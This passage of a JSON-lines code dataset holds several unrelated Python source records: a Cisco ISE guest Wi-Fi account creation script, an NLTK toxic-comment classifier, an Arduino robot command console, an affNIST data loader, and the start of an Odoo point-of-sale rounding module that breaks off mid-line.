error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n\n except Exception as e:\n LogMessage('ERR', \"[3-01-004-0001]\",\"API gave an exception. Error: {0}\".format(e))\n # sys.exit(1)\n break\n return bulk_ID\n\n def Get_Bulk_Request_Details(self, url, headers, bulk_id):\n '''\n Function: Get_Bulk_Request_Details\n\n .SYNOPSIS:\n This module includes API invocation bulk Guest Account creation\n\n .DESCRIPTION:\n This module includes API invocation bulk Guest Account creation\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [string] bulk_id: Bulk_request ID for which the user Details has to be fetched\n\n .OUTPUTS:\n [list] bulk_request_details : Details of the specified bulk request ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n bulk_id = '12783920023283'\n bulk_ID = Create_Bulk_Users(Domain_name, headers, bulk_id)\n\n .NOTES: None\n '''\n\n url += '/ers/config/guestuser/bulk/'+ bulk_id\n LogMessage('INF', \"[0-00-000-0000]\", \"Get Bulk request Details API ====>\" + url)\n\n bulk_request_details = {'success_count': 0,\n 'failure_count': 0,\n 'account_IDs': []}\n IDs = []\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if response.status_code == 200:\n response_data = response.json()\n bulk_request_details['success_count'] = response_data['BulkStatus']['successCount']\n bulk_request_details['failure_count'] = response_data['BulkStatus']['failCount']\n\n count = 0\n for each_user in response_data['BulkStatus']['resourcesStatus']:\n count += 1\n if (each_user['status'] == 'SUCCESS'):\n IDs.append(each_user['id'])\n elif (each_user['status'] == 'PENDING'):\n IDs.append(each_user['id'])\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't get bulk user - {0} details. Error message ==>{1} \".format(count, each_user['rootCause']))\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't get bulk user details. API returned a status code ==>{0} \".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't get bulk user details. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to get bulk user details.\", str(err))\n # sys.exit(1)\n\n except Exception as e:\n # error_message = response.json()['ERSResponse']['messages'][0]['title']\n error_message = 'webservice gave an error'\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n # sys.exit(1)\n break\n\n bulk_request_details['account_IDs'] = IDs\n LogMessage(\"INF\", \"[0-00-000-0000]\", \"bulk_request_details =======>\"+str(bulk_request_details))\n return bulk_request_details\n\n def Get_User_Details(self, url, headers, UserID, reason, userType, duration, RequesterName):\n\n '''\n Function: Get_User_Details\n\n .SYNOPSIS:\n This module includes API invocation to get the User details of the specified User ID\n\n .DESCRIPTION:\n This module includes API invocation to get the User details of the specified User ID\n If the API invocation failed due to network issue the API will be invoke again after 1,3,5 min time intervals\n\n .DEPENDENCIES:\n Required Module : Requests,base64\n\n .PARAMETER ALL:\n [string] url: CISCO ISE Domain Name\n [dict] headers: Request header\n [String] UserID: User ID for which the Details has to be fetched\n\n specific to Requirement:\n [dict] reason: Reason for visit\n [String] userType: user type single or bulk\n [String] RequesterName: user type single or bulk\n\n .OUTPUTS:\n [dict] user_details : User Details of the specified User ID\n\n .EXAMPLE 1:\n Domain_name= '*.harman.com:9060'\n reds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n headers = {\n 'accept': \"application/xml\",\n 'content-type': \"application/xml\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n UserID = '12783920023283'\n userType = 'single'\n User_details = Create_Bulk_Users( Domain_name, headers, UserID, reason, userType, duration, RequesterName)\n\n .NOTES: None\n '''\n\n url += ('/ers/config/guestuser/' + UserID)\n\n user_details={}\n time_interval = [0, 60, 120, 180]\n tries = 4\n for retry_time in time_interval:\n try:\n time.sleep(retry_time)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n\n LogMessage('INF', \"[0-00-000-0000]\", \"Webservice response =====> \" + str(response))\n\n if response.status_code == 200:\n response_json = response.json()\n\n user_details['Username'] = response_json['GuestUser']['guestInfo']['userName']\n user_details['Password'] = response_json['GuestUser']['guestInfo']['password']\n user_details['ValidFrom'] = response_json['GuestUser']['guestAccessInfo']['fromDate']\n user_details['ValidTo'] = response_json['GuestUser']['guestAccessInfo']['toDate']\n user_details['Duration'] = duration\n user_details['ReasonForvisit'] = reason\n user_details['PersonBeingVisited'] = RequesterName\n if userType.lower() == 'single':\n\n user_details['FirstName'] = response_json['GuestUser']['guestInfo']['firstName']\n user_details['LastName'] = response_json['GuestUser']['guestInfo']['lastName']\n\n else:\n LogMessage('ERR', \"[0-00-000-0000]\",\n \"Couldn't create the Guest user account. API returned a status code ==>{0} \\n Retrying. . . . . \".format(\n str(response.status_code)))\n\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API Error Encountered. couldn't Create the Guest user Account. Retrying. . . . .\", str(err))\n tries -= 1\n if tries != 0: # until tries count is zero\n continue\n else:\n LogMessage('ERR', \"[3-01-004-0001]\", \"Failed to create the Guest user Account.\", str(err))\n\n except Exception as e:\n # catastrophic error. bail.\n error_message = response.json()['ERSResponse']['messages'][0]['title']\n LogMessage('ERR', \"[3-01-004-0001]\",\n \"API gave an exception ======>{0} \\nerror message: {1}\".format(e, error_message))\n break\n\n #print(\"user_details ====>\",user_details)\n return user_details\n\n\nif __name__ == \"__main__\":\n\n Valid_Sponsor_Account(G_CISCO_ISE_Domain, G_sponsor_username, G_sponsor_Password)\n User = Guest_user_details()\n\n # getting to and from Dates\n valid_days, from_date, to_date = User.get_date(G_Duration)\n\n user_count = 0\n user_success_count = 0\n user_failure_count = 0\n User_ID_List = []\n\n # header remains the same for single user and multiple user same\n creds = str.encode(':'.join((G_sponsor_username, G_sponsor_Password)))\n encodedAuth = bytes.decode(base64.b64encode(creds))\n\n headers = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'authorization': \" \".join((\"Basic\", encodedAuth)),\n 'cache-control': \"no-cache\"\n }\n\n\n # based on if the user type is bulk or single invoking the required API\n if G_User_Type.lower() == 'single':\n\n # creating the guest users and getting the response\n payload = {\n \"GuestUser\": {\n \"guestType\": \"\",\n \"portalId\": \"\",\n \"guestInfo\": {\n \"firstName\": \"\",\n \"lastName\": \"\",\n \"enabled\": True\n },\n \"guestAccessInfo\": {\n \"validDays\": \"\",\n \"fromDate\": \"\",\n \"toDate\": \"\",\n \"location\": \"\"\n }\n }\n }\n\n # Updating the payload\n payload['GuestUser']['guestType'] = G_guestType\n payload['GuestUser']['portalId'] = G_portalId\n payload['GuestUser']['guestAccessInfo']['location'] = G_Location\n\n payload['GuestUser']['guestAccessInfo']['validDays'] = valid_days\n payload['GuestUser']['guestAccessInfo']['fromDate'] = from_date\n payload['GuestUser']['guestAccessInfo']['toDate'] = to_date\n\n user_count = 1\n # hit the web-service to create the user and get the user ID\n\n # Guest_account_ID = ''\n payload['GuestUser']['guestInfo']['firstName'] = G_user_firstName\n payload['GuestUser']['guestInfo']['lastName'] = G_user_lastName\n\n print(\"Single user request Playload ===> \",payload)\n Guest_account_ID = User.Create_Guest_user(G_CISCO_ISE_Domain, headers, payload)\n if (len(Guest_account_ID)) > 0:\n User_ID_List.append(Guest_account_ID)\n user_success_count = 1\n\n else:\n user_failure_count = 1\n\n elif G_User_Type.lower() == 'bulk':\n\n # updating the request header JSON for the Request\n headers['accept'] = \"application/json\"\n headers['content-type'] = \"application/xml\"\n\n if int(G_Guest_User_Count) < 1:\n print(\"\\nFailureFail to Create bulk request, User count is less than one\")\n exit(0)\n\n # forming the required XML for the Bulk User request\n payload = ''\n for user in range(0, int(G_Guest_User_Count)):\n user_payload = ''\n user_payload += '' + from_date + ''\n user_payload += '' + G_Location + ''\n user_payload += '' + to_date + ''\n user_payload += '' + str(valid_days) + ''\n user_payload += 'true'\n user_payload += '' + G_Username_Prefix + ''\n user_payload += '' + str(random.randint(1000, 9999)) + ''\n user_payload += '' + G_guestType + ''\n user_payload += '' + G_portalId + ''\n payload += user_payload\n payload += ''\n\n # Invoking the module with the Header and Request Payload(xml) to create the BULK request\n Bulk_ID = User.Create_Bulk_Users(G_CISCO_ISE_Domain, headers, payload)\n # Bulk_ID = '1544694498913'\n LogMessage(\"INF\", \"[0-00-000-0000]\", \"Bulk ID ======>\"+Bulk_ID)\n\n # if create Bulk request fails then print the Error XML\n if len(Bulk_ID) == 0:\n print(\"\\nFailureFail to Create bulk request\")\n exit(0)\n\n # invoking the method to get the User ID for each of the success Accounts in the bulk request\n headers['accept'] = \"application/json\"\n headers['content-type'] = \"application/json\"\n bulk_request_details = User.Get_Bulk_Request_Details(G_CISCO_ISE_Domain, headers, Bulk_ID)\n\n user_count = int(G_Guest_User_Count)\n user_success_count = bulk_request_details['success_count']\n user_failure_count = bulk_request_details['failure_count']\n User_ID_List = bulk_request_details['account_IDs']\n\n # Check if the User Success count is greater than Zero, if yes get the details of each ID and for the Xml\n if user_success_count == 0:\n print(\"\\nFailureFail to Create the Guest User Account(s)\")\n exit(1)\n\n else:\n # getting the user account details for each User IDs\n user_details = []\n\n PrivateLog_UserDetails = ''\n for user_id in User_ID_List:\n details = User.Get_User_Details(G_CISCO_ISE_Domain, headers, user_id, G_Reason_For_Visit, G_User_Type,G_Duration,G_Requester_Name)\n if len(details) > 0:\n user_details.append(details)\n PrivateLog_UserDetails += '
User details:
'\n for key in details:\n PrivateLog_UserDetails += str(key) + ' : ' + str(details[key]) + '
'\n user_success_count += 1\n else:\n user_failure_count += 1\n\n ScriptOutput = {'Data': {},\n 'Status': '',\n 'PrivateLog': ''\n }\n if user_count == user_failure_count:\n ScriptOutput['Data']['UserDetails'] = []\n ScriptOutput['Data']['FailCount'] = user_failure_count\n ScriptOutput['Data']['SuccessCount'] = (user_count-user_failure_count)\n ScriptOutput['Status'] = 'Failure'\n ScriptOutput['PrivateLog'] = 'Failed to Get the user accounts Details'\n else:\n ScriptOutput['Data']['UserDetails'] = user_details\n ScriptOutput['Data']['FailCount'] = user_failure_count\n ScriptOutput['Data']['SuccessCount'] = (user_count - user_failure_count)\n ScriptOutput['Status'] = 'Success'\n ScriptOutput['PrivateLog'] = 'Successfully fetched the user account Details'+ PrivateLog_UserDetails\n\n xml = dicttoxml(ScriptOutput, custom_root=\"ScriptOutput\", attr_type=False)\n xml_str = (xml.decode(\"utf-8\"))\n xml_str = re.sub('', '', xml_str)\n xml_str = re.sub('', '', xml_str)\n print(\"\\n\", xml_str)\n\n","sub_path":"STG/Guest_WIFI_Create_Account.py","file_name":"Guest_WIFI_Create_Account.py","file_ext":"py","file_size_in_byte":33187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"185942812","text":"import nltk\nimport random\nimport csv\nimport re\nimport string\nimport os\nimport sys\nfrom urllib import request\nfrom nltk import FreqDist\nfrom nltk.corpus import stopwords \nfrom nltk.stem import PorterStemmer \nfrom nltk.tokenize import word_tokenize\nfrom nltk.util import bigrams\n\n#collect bad words\nbad_words = {}\n\nfor file in os.listdir(\"./bad_word/csv_file/\"):\n\twith open(\"./bad_word/csv_file/\" + file, errors = 'ignore') as f:\n\t\tdata = csv.reader(f, delimiter = \";\")\n\t\ttemp_data = set()\n\t\tfor row in data:\n\t\t\tif(len(row) > 0):\n\t\t\t\ttemp_data.add(row[0])\n\t\tbad_words[\"./bad_word/csv_file/\" + file] = temp_data\nfor file in os.listdir(\"./bad_word/txt_file/\"):\n\twith open(\"./bad_word/txt_file/\" + file, errors = 'ignore') as f:\n\t\ttemp_data = set()\n\t\tfor row in f:\n\t\t\tif(len(row.strip()) > 0):\n\t\t\t\ttemp_data.add(row.strip())\n\t\tbad_words[\"./bad_word/txt_file/\" + file] = temp_data\nfor file in os.listdir(\"./bad_word/comma_seperated_txt_file/\"):\n\twith open(\"./bad_word/comma_seperated_txt_file/\" + file, errors = 'ignore') as f:\n\t\ttemp_data = set()\n\t\tfor row in f:\n\t\t\tif not (len(row.strip()) == 0 or row.strip().startswith(\"##\")):\n\t\t\t\tfor word in row.strip().split(', '):\n\t\t\t\t\ttemp_data.add(word)\n\t\tbad_words[\"./bad_word/comma_seperated_txt_file/\" + file] = temp_data\n\nps = PorterStemmer() #stemmer\nstopwords = set(stopwords.words('english')) #stopword\nenglishwords = set(nltk.corpus.words.words())\nlabels = [\"toxic\",\"severe_toxic\",\"obscene\",\"threat\",\"insult\",\"identity_hate\"]\n\n#collect train data\ntrain_data = []\nwith open(\"./toxic_comment/train.csv\") as f:\n\tdata = csv.reader(f)\n\tnext(data)\n\tfor row in data:\n\t\ttrain_data.append((row[1],{\"toxic\" : int(row[2]), \"severe_toxic\" : int(row[3]), \"obscene\" : int(row[4]), \"threat\" : int(row[5]), \"insult\": int(row[6]), \"identity_hate\" : int(row[7])}))\n\n#negative features. Input is a sentence (raw string)\ncount = 0\ndef negative_features(sent):\n\twords = word_tokenize(sent) #tokenize into list of words\n\t#clean the data\n\t#tag_words = nltk.pos_tag(words) #add tag into each word\n\t#add features\n\tdic = {}\n\tdic.update(num_word(sent))\n\tdic.update(num_unique_word(sent))\n\tdic.update(ration_unique(sent))\n\tdic.update(num_token_no_stop(words))\n\tdic.update(num_spelling_error(words))\n\tdic.update(num_allcap(words))\n\tdic.update(rate_allcap(sent,words))\n\tdic.update(length_cmt(sent))\n\tdic.update(num_cap_letter(sent))\n\tdic.update(rate_cap_letter(sent))\n\tdic.update(num_explan_mark(sent))\n\tdic.update(rate_explan_mark(sent))\n\tdic.update(num_quest_mark(sent))\n\tdic.update(rate_quest_mark(sent))\n\tdic.update(num_punc_mark(sent))\n\tdic.update(num_mark_sym(sent))\n\tdic.update(num_smile(words))\n\tdic.update(rate_lower(sent))\n\treturn dic\n#features\ndef num_word(raw):\n '''\n count the number of word (duplicated)\n a word is defined as a substring seperated by space\n input: raw : string\n out put: dict num word: number of word \n '''\n return ({'num_word': len(raw.split())})\ndef num_unique_word(raw):\n '''\n count number of unique word (not duplicated)\n input raw: string\n output: dict num_unique_word: number of unique word\n '''\n return ({'num_unique_word':len(set(raw.split()))})\ndef ration_unique(raw):\n '''\n compute ration of unique word\n a word is a substring seperated by space\n input raw : str\n output: dict ration_unique : ration of unique word\n '''\n rate = num_unique_word(raw)['num_unique_word']/num_word(raw)['num_word']\n return ({'ration unique': round(rate,3)})\ndef num_token_no_stop(tokened):\n '''\n return number of token without stop word (depend on token function, can conclude '.', ',')\n duplicated\n intput tokened list : list\n output dict num token no stop: number of tokens without stop word \n '''\n no_stop= [w for w in tokened if w.lower() not in stopwords]\n return ({'num_token_no_stop':len(no_stop)})\ndef num_spelling_error(tokened):\n '''\n return number of word not in English vocab\n can be counted differences, women, measures (hàm kém vl)\n can be counted ',','.', \n input tokened: list\n output: dict num spelling error :number of tokens not in English vocab\n '''\n spell_wrong= [w for w in tokened if w.lower() not in englishwords]\n return ({'num_spelling_error':len(spell_wrong)})\ndef num_allcap(tokened):\n '''\n return number of word written all captial (duplicated)\n input tokened: list\n output: dict num all cap: number of tokens written all capital\n '''\n cap= [w for w in tokened if w.isupper()]\n return ({'num_all_cap':len(cap)})\ndef rate_allcap(raw, tokened):\n '''\n return portion of word written all capital (duplicated)\n input: raw: str\n tokened: list\n output: dict rate all cap :rate of all capital word\n '''\n rate = num_allcap(tokened)['num_all_cap']/ num_word(raw)['num_word']\n return ({'rate_all_cap': round(rate, 3)})\ndef length_cmt(raw):\n '''\n return length of the cmt\n intput raw: str\n output: dict 'length cmt':length of the cmt\n '''\n return ({'length_cmt': len(raw)})\ndef num_cap_letter(raw):\n '''\n return number of capital letter\n input raw: str\n output: dict 'num cap letter':number of capital letter\n '''\n cap = [w for w in raw if w.isupper()]\n return({'num_cap_letter':len(cap)})\ndef rate_cap_letter(raw):\n '''\n return ratio of capital letter\n input raw: str\n outout: dict 'rate cap letter': ratio of capital letter\n '''\n rate = num_cap_letter(raw)['num_cap_letter']/len(raw)\n return({'rate_cap_letter':round(rate, 3)})\ndef num_explan_mark(raw):\n '''\n return number of explanation mark (not necessary using as explanation)\n input raw: str\n output: dict 'num explan mark': number of explanation mark\n '''\n count=0\n for c in raw:\n if c=='!':\n count = count+1\n return {'num_explan_mark':count}\ndef rate_explan_mark(raw):\n '''\n return rate of explanation mark (not necessary using as explanation)\n input raw: str\n output: rate of explanation mark\n '''\n rate = num_explan_mark(raw)['num_explan_mark']/len(raw)\n return({'rate_explan_mark':round(rate, 3)})\ndef num_quest_mark(raw):\n '''\n return number of question mark (not necessary using as question)\n input raw: str\n output: dict 'num quest mark' number of question mark\n '''\n count=0\n for c in raw:\n if c=='?':\n count=count+1\n return {'num_quest_mark' : count}\ndef rate_quest_mark(raw):\n '''\n return rate of question mark (not necessary using as question)\n input raw: str\n output: dict 'rate quest mark':rate of question mark\n '''\n rate = num_quest_mark(raw)['num_quest_mark']/len(raw)\n return {'rate quest mark' : round(rate, 3)}\ndef num_punc_mark(raw):\n '''\n return number of punctuation mark (not necessary using as finish setences)\n input tokened: str\n output: dict 'num punc mark': number of punctuation mark\n '''\n count=0\n for c in raw:\n if c=='.':\n count=count+1\n return {'num_ounc_mark': count}\ndef num_mark_sym(raw):\n '''\n return number of marking symbol (*, &,$,%)\n input raw: str\n output: dict 'num mark sym' :number of marking symbol mark\n '''\n count=0\n for c in raw:\n if c in {'*','&','$','%'}:\n count=count+1\n return {'num_mark_sym': count}\ndef num_smile(tokened):\n '''\n Count the number of emoji (can not count the case hoang:) or :))))\n input: tokened: list\n output:dict 'num smile': number of smile\n '''\n count= 0\n for w in bigrams(tokened):\n if w== (':',')'):\n count=count+1\n return {'num_smile':count}\ndef rate_lower(raw):\n '''\n Count the rate of lowercase character\n input raw: str\n output: dict 'rate lower': rate of lowercase letter\n '''\n l = [w for w in raw if w.islower()]\n rate = len(l)/len(raw)\n return({'rate_lower': round(rate, 3)})\n\n#classify data using NaiveBayes\nfeature_vector = [negative_features(sent) for (sent,tag) in train_data]\nfor label in labels:\n\tfeaturesets = []\n\tfor i in range(len(train_data)):\n\t\tfeaturesets.append((feature_vector[i], train_data[i][1][label]))\n\tsize = int(0.1*len(featuresets))\n\ttrain_set, test_set = featuresets[size:], featuresets[:size]\n\tclassifier = nltk.NaiveBayesClassifier.train(train_set)\n\n\terrorPP, errorPN, errorNP, errorNN = 0, 0, 0, 0\n\tfor (feature, tag) in test_set:\n\t\tpredict = classifier.classify(feature)\n\t\tif predict == tag:\n\t\t\tif tag == 1:\n\t\t\t\terrorPP += 1\n\t\t\telse:\n\t\t\t\terrorNN += 1\n\t\telse:\n\t\t\tif tag == 1:\n\t\t\t\terrorNP += 1\n\t\t\telse:\n\t\t\t\terrorPN += 1\n\tprecision = round(errorPP/(errorPP + errorPN),4)\n\trecall = round(errorNN/(errorNN + errorNP),4)\n\n\tprint(\"Label {}: Accuracy = {} Precision = {} Recall = {}\".format(label, nltk.classify.accuracy(classifier, test_set), precision, recall))\n\t#classifier.show_most_informative_features(20)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"460273520","text":"#!/usr/bin/env python3\n\nimport os\nimport types\nimport logging\nimport importlib\n\ntry:\n from cmd2 import Cmd # , options, make_option\nexcept ImportError as err:\n print(\"Maybe you should pip3 install cmd2 (the better cmd class)\")\n\nfrom rip.head.spine.core import get_spine\n\nrc_dict = {}\n\n# RipCom-specific things.\ncurrent_search_path = os.path.dirname(os.path.realpath(__file__)) + \"/appendages\"\ncurrent_import_path = \"appendages\"\nfile_list = []\nfor f in os.listdir(current_search_path):\n if os.path.isfile(current_search_path + \"/\" + f) and f[-3:] == \".py\" and not f == \"__init__.py\" and not f == \"units.py\":\n file_list.append(f)\nfor f in file_list:\n module = importlib.import_module(\"{0:s}.{1:s}\".format(current_import_path, f[:-3]))\n class_name = f[:-3].replace('_', ' ').title().replace(' ', '')\n rc_dict[class_name] = getattr(module, class_name)\n\n# Points to the current robot's code.\nCURRENT_ARDUINO_CODE_DIR = \"/Robot/CurrentArduinoCode\"\n\n\nclass rip_com(Cmd):\n intro = \"Welcome to RipCom. Type help or ? for commands.\\nCtrl-D to exit.\"\n prompt = \"[RC]> \"\n doc_header = \"Documentation available for:\"\n undoc_header = \"Not documented:\"\n gs = None\n s = None\n appendages = None\n device = None\n\n def __init__(self):\n super().__init__()\n self.refreshDevices()\n\n def refreshDevices(self):\n self.registeredDevices = [d for d in os.listdir(CURRENT_ARDUINO_CODE_DIR)\n if os.path.isdir(\"{0:s}/{1:s}\".format(CURRENT_ARDUINO_CODE_DIR, d)) and\n not d == \".git\" and os.path.exists(\"{0:s}/{1:s}/{1:s}.json\"\n .format(CURRENT_ARDUINO_CODE_DIR, d))]\n if len(self.registeredDevices) != 0:\n self.registeredDevices.sort()\n\n self.connectedDevices = [d for d in self.registeredDevices\n if os.path.exists(\"/dev/{0:s}\".format(d))]\n if len(self.connectedDevices) != 0:\n self.connectedDevices.sort()\n\n self.lockedDevices = [d for d in self.connectedDevices\n if os.path.exists(\"/var/lock/{0:s}.lck\".format(d))]\n if len(self.lockedDevices) != 0:\n self.lockedDevices.sort()\n\n def do_connect(self, parseResults):\n self.refreshDevices()\n\n args = parseResults.parsed[1].split()\n if len(args) != 1:\n self.help_connect()\n return\n arduinoName = args[0]\n\n if arduinoName not in self.connectedDevices:\n print(\"Arduino \\\"{}\\\" is not available.\".format(arduinoName))\n return\n\n self.gs = get_spine(devices=[arduinoName])\n self.s = self.gs.__enter__()\n self.appendages = self.s.get_appendage_dict()\n\n def registerMethods(RCClass):\n self.__dict__[\"do_\" + name] = types.MethodType(RCClass.interact, self)\n self.__dict__[\"help_\" + name] = types.MethodType(RCClass.help, self)\n self.__dict__[\"complete_\" + name] = types.MethodType(RCClass.complete, self)\n\n for name, appendage in self.appendages.items():\n if appendage.__class__.__name__ in rc_dict:\n registerMethods(rc_dict[appendage.__class__.__name__])\n else:\n print(\"{0:s} not found among RC imports\".format(appendage.label))\n\n self.device = arduinoName\n\n def help_connect(self):\n print(\"usage: connect \")\n print(\"Normally, ArduinoName could be something as simple as 'mega'\")\n\n def complete_connect(self, text, line, begidx, endidx):\n return [i for i in self.connectedDevices if i.startswith(text)]\n\n def do_disconnect(self, parseResults):\n if self.appendages is not None:\n for name in self.appendages:\n del self.__dict__[\"do_\" + name]\n del self.__dict__[\"help_\" + name]\n del self.__dict__[\"complete_\" + name]\n self.appendages = None\n\n self.gs.__exit__(None, None, None)\n self.s = None\n self.gs = None\n\n def help_disconnect(self):\n print(\"usage: disconnect\")\n print(\"Disconnects from a connected arduino.\")\n\n def do_list(self, parseResults):\n self.refreshDevices()\n self.print_topics(\"Connected Devices\", self.connectedDevices, 15, 80)\n self.print_topics(\"Locked Devices\", self.lockedDevices, 15, 80)\n do_li = do_list\n do_l = do_list\n\n def help_list(self):\n print(\"Lists the currently connected arduinos\")\n\n def do_rmlock(self, parseResults):\n self.refreshDevices()\n arduinoName = parseResults.parsed[1]\n\n if arduinoName != \"\":\n if arduinoName == self.device:\n print(\"You are currently connected to {0:s}, lockfile not removed.\".format(arduinoName))\n elif arduinoName in self.lockedDevices:\n try:\n os.remove(\"/var/lock/{0:s}.lck\".format(arduinoName))\n print(\"Removed the {0:s} lockfile.\".format(arduinoName))\n except PermissionError:\n print(\"You don't have permission to remove the {0:s} lockfile.\".format(arduinoName))\n elif arduinoName in self.connectedDevices:\n print(\"{0:s} is not locked.\".format(arduinoName))\n elif arduinoName in self.registeredDevices:\n print(\"{0:s} is not connected.\".format(arduinoName))\n else:\n print(\"{0:s} is not registered.\".format(arduinoName))\n else:\n for arduinoName in self.lockedDevices:\n if arduinoName == self.device:\n print(\"You are currently connected to {0:s}, lockfile not removed.\".format(arduinoName))\n else:\n try:\n os.remove(\"/var/lock/{0:s}.lck\".format(arduinoName))\n print(\"Removed the {0:s} lockfile.\".format(arduinoName))\n except PermissionError:\n print(\"You don't have permission to remove the {0:s} lockfile.\".format(arduinoName))\n\n def help_rmlock(self):\n print(\"Removes lockfiles for connected devices.\")\n print(\"If no device name is specified, removes all lockfiles.\\n\")\n print(\"usage: rmlock\")\n print(\" rmlock \")\n\n def complete_rmlock(self, text, line, begidx, endidx):\n return [i for i in self.lockedDevices if i.startswith(text)]\n\n def do_exit(self, parseResults):\n self.do_disconnect(None)\n return True\n\n def help_exit(self):\n print(\"Disconnects from any connected arduinos, and exits ArduinoCom.\")\n\n def do_quit(self, parseResults):\n return self.do_exit(parseResults)\n\n def help_quit(self):\n print(\"Alias for exit\")\n\n def do_EOF(self, parseResults):\n print()\n return self.do_exit(parseResults)\n do_eof = do_EOF\n\n def help_help(self):\n print(\"Prints help for commands\")\n\n def get_names(self):\n names = dir(self)\n names.remove(\"do_EOF\")\n names.remove(\"do_eof\")\n names.remove(\"do_q\")\n return names\n\n\n# Initializes the command interface loop on the terminal.\n# Uses __main__ detection so that this file can be used as an import from other pys.\nif __name__ == '__main__':\n rc = rip_com()\n rc.debug = True\n rc.case_insensitive = True\n logging.disable(logging.INFO)\n rc.cmdloop()\n","sub_path":"rip_com.py","file_name":"rip_com.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"629699453","text":"__author__ = 'yizhangzc'\n\n# course: CV\n# teacher: DongHui Wang\n# author: zju_cs / Yi Zhang / 21721190\n# mail: yizhangzc@gmail.com\n# data: 2018/5\n# environment: ubuntu 14.04 / python 3.5 / numpy 1.14 / tensorflow 1.2 / CUDA 8.0\n\nimport numpy as np\n\nimport scipy.io as sio\n\nclass DatasetConfig( object ):\n\n def __init__( self ):\n self._dataset_path = \"/data/zy/course/cv/\"\n self._class_num = 10\n self._row = 40\n self._column = 40\n\nclass AffNIST( object ):\n\n cfg = DatasetConfig()\n\n def __init__( self ):\n \n self.cfg._dataset_path = \"/data/zy/course/cv/\"\n self.cfg._class_num = 10\n self.cfg._row = 40\n self.cfg._column = 40\n\n def load_data( self ):\n\n print( \"loading data...\" )\n\n train_data_path = self.cfg._dataset_path + \"training_and_validation_batches/\"\n test_data_path = self.cfg._dataset_path\n\n train_x = np.empty( [ 0, 1600 ], dtype = np.float32 )\n train_y = np.empty( [ 0 ], dtype = np.int32 )\n\n for i in range( 32 ):\n\n data = sio.loadmat( train_data_path + \"{}.mat\".format( i + 1 ) )\n train_x = np.vstack( ( train_x, np.transpose( data[\"affNISTdata\"][0][0][2] )[0: 200] ) )\n train_y = np.concatenate( [ train_y, data[\"affNISTdata\"][0][0][5][0][0: 200] ] )\n print( \"{}.mat finished!\".format( i + 1 ) )\n\n\n test_data = sio.loadmat( test_data_path + \"test.mat\" )\n print( \"test.mat finished!\" )\n\n\n test_x = np.transpose( test_data[\"affNISTdata\"][0][0][2] )[0: 200]\n test_y = test_data[\"affNISTdata\"][0][0][5][0][0: 200]\n\n test_x.astype( np.float32 )\n test_y.astype( np.int32 )\n\n train_x = np.true_divide( train_x, 255. )\n test_x = np.true_divide( test_x, 255. )\n\n print( \"train_x shape:{} type:{}\\n\".format( train_x.shape, train_x.dtype ) + \\\n \"train_y shape:{} type:{}\\n\".format( train_y.shape, train_y.dtype ) + \\\n \"test_x shape:{} type:{}\\n\".format( test_x.shape, test_x.dtype ) + \\\n \"test_y shape:{} type:{}\".format( test_y.shape, test_y.dtype ) )\n \n print( \"data loaded!\" )\n\n return train_x, train_y, test_x, test_y","sub_path":"classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"92300990","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom openerp.osv import osv, fields\r\nimport math\r\n\r\nclass pos_order_line(osv.osv):\r\n _name='pos.order.line' \r\n _inherit='pos.order.line'\r\n def _amount_line_all(self, cr, uid, ids, field_names, arg, context=None):\r\n\r\n user = self.pool.get('res.users').browse(cr, uid, uid)\r\n company = user.company_id\r\n factor = int(100 / company.wf_rounding_pos)\r\n\r\n res = dict([(i, {}) for i in ids])\r\n account_tax_obj = self.pool.get('account.tax')\r\n cur_obj = self.pool.get('res.currency')\r\n for line in self.browse(cr, uid, ids, context=context):\r\n taxes = line.product_id.taxes_id\r\n price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\r\n\r\n taxes = account_tax_obj.compute_all(cr, uid, line.product_id.taxes_id, price, line.qty, product=line.product_id, partner=line.order_id.partner_id or False)\r\n\r\n if company.wf_rounding_policy == 'even':\r\n rounded_amount = round(taxes['total_included'] * 